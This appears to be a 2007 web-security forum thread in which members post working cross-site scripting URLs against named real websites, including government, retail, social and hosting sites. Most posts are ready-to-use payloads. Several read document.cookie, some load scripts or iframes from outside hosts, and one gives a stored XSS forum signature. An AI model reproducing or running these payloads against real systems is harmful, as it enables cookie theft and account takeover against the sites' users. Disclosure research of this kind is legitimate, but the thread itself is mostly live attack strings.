Ronald, u mean ppl from internet is hitting you?

http://hackathology.blogspot.com

I guess he meant his site is being probed for XSS, SQLI etc.

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)

being hit constantly is another huge issue, I also constantly see incoming ssh connections on my servers too... no matter however many IP addresses I add to the denied list, the constant ssh brute force just keeps on going.. I wonder if there's a way to prevent that apart from contacting the ISP's and informing them about it.

the sad part about contacting ISP's is that I am really not sure if they do anything about it...

Brother's gonna work it out....

Stored XSS on The Chemical Brother's new forum... http://www.thechemicalbrothers.com/forum/

Set profile signature to [img:208f4348a3]../images/chem-logo.png" style="-moz-binding:url(XBL_HERE);[/img:208f4348a3]

Notified them about a month ago. No reply. Love is all.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Well I won't even twitch my eyes when I get hacked on the server level, it's not my job to secure that. I rent the space, so they have to figure that one out. My job is the webapplayer and I can sleep well at night, I can tell ya. And what if someone manage to square his eyes through a glowing terminal all month, what does he got? 400+ articles and a bunch of rants which are backed up plenty of times. I switch DNS and am back in 3 hours. As simple as that :)

Security University: Their header says "Are you secure? How do you know?" Another part says "Qualified Training, Qualified Results".

https://www.securityuniversity.net/reg.php?crsNm=%20BUY%20%201%20CEH%20and%20ECSA%20%20get%20FREE%20LPT%20or%20CISSP"><script>alert('XSS');</script>

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)
I'm always being hit with PHP shell attempts, but they don't work on my site. Yesterday I noticed someone from Amsterdam ran Acunetix against my site, which I didn't appreciate, because if anything it's an annoyance to see all the retarded file names that I don't use show up in my statistics. The only "vulnerabilities" Acunetix finds on my site are TRACE requests, and files that point to missing files (I didn't specify a whole path in some of the links on my error pages).


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('WTF') <-- sorry if this has been posted before also wasnt sure if this should be under redirect !



Edited 2 time(s). Last edit at 06/27/2007 11:00PM by epsteinbar.

https://tbe.taleo.net/login.jsp?loginErrorMsg=<SCRIPT>alert('XSS');</SCRIPT>
Coupled with the fact that when a user signs up to apply for a job, the site echoes back their chosen password in plaintext, this could be quite dangerous.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/28/2007 02:35PM by tx.

Weather Underground, I think there's loads here

http://www.wunderground.com/wximage/viewsingleimage.html?mode=singleimage&handle=<script>alert("XSS")</script>&number=0



Edited 1 time(s). Last edit at 06/28/2007 05:42PM by tr1pp33.

oh great...Epsteinbar brought the FBI to the party...now were all fucked!

Not the first time a 3 letter agency has been called out.

-id

Ode to my old heros:

http://www.metallica.com/timeline.asp?page=gallery&n_categoryid=2777&year=19882%22%3E%3C/object%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E

More of thase:

http://www.paroles32.com/paroles/m.php
http://www.paroles32.com/paroles/n.php
http://www.paroles32.com/paroles/o.php
http://www.paroles32.com/paroles/p.php
http://www.paroles32.com/paroles/q.php
http://www.paroles32.com/paroles/r.php
http://www.paroles32.com/paroles/s.php
http://www.paroles32.com/paroles/t.php
http://www.paroles32.com/paroles/u.php

Paroles de chanciones:
http://www.paroles32.com/paroles/madonna/index.php
http://www.paroles32.com/paroles/wet-wet-wet/index.php

And other are in french but ok

wtf?

Obvious SPAM is obvious.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.nascio.org/events/calendar.cfm?month=8&year=2007%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C
seems to be part of a generic coldfusion error page which is by itself rather juicy: http://www.nascio.org/events/calendar.cfm?month=8&year=2007x

POWNCE > http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/request_invite/&request_email=%3Cscript%3Ealert%28%27homfg%27%29%3B%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 07/04/2007 11:37PM by digi7al64.

zooomr: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://beta.zooomr.com/login/&gogogo=1&username=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

http://pownce.com/add_friends/query/%2522%253E%253Cscript%253Ealert%25280%2529%253C%252Fscript%253E/

> pownce.com

Here's another one:

PoC: http://p0wnz.website-security.org/poc.swf
AS source: http://p0wnz.website-security.org/poc.as.txt

PoC works if user has an account and uses Flash plugin.

http://www.filepedia.com/search/results.cfm?hakusanat=%22%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E%3C%22

dreamhost 2.0

http://discussion.dreamhost.com/showprofile.pl?Cat=0&User=moua%22%3E%3C/title%3E%3Cscript%3Ealert(document.location);%3C/script%3E%3Ctitle%3E

Some things will never change ^^

WWW.com The XSS Starts Here

http://www.www.com/search.php?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

3ric Wrote:
-------------------------------------------------------
> > pownce.com
>
> Here's another one:
>
> PoC: http://p0wnz.website-security.org/poc.swf

And yet another one in pownce...
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/forgot/&email=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------
pen-test blog @ http://www.hideaway.net

http://www.darknet.org.uk/index.php?s="><script>alert(document.cookie);</script><"
http://www.sitemeter.com/?a=stats&s="><script>alert(document.cookie);</script><"

Acquired by Google for $625 million in order to make sure Google's apps are secure in future...

http://www.postini.com/register/index.php?FreeTrial=1&src=%22%3E%3Cscript/src=http://h4k.in/j.js%3E

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

http://govtsecurity.com/searchresults/?terms=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0

http://data.aolsearchlogs.com/search/do.cgi?QUERY=XSS%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Ca=%22

http://tinyurl.com/2w53ks
That one is for hellboundhackers.org, to test it you need 1) an account, 2) to be logged in and 3) one or more PMs in your inbox.
They have more XSS flaws, but this one was actually interesting.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer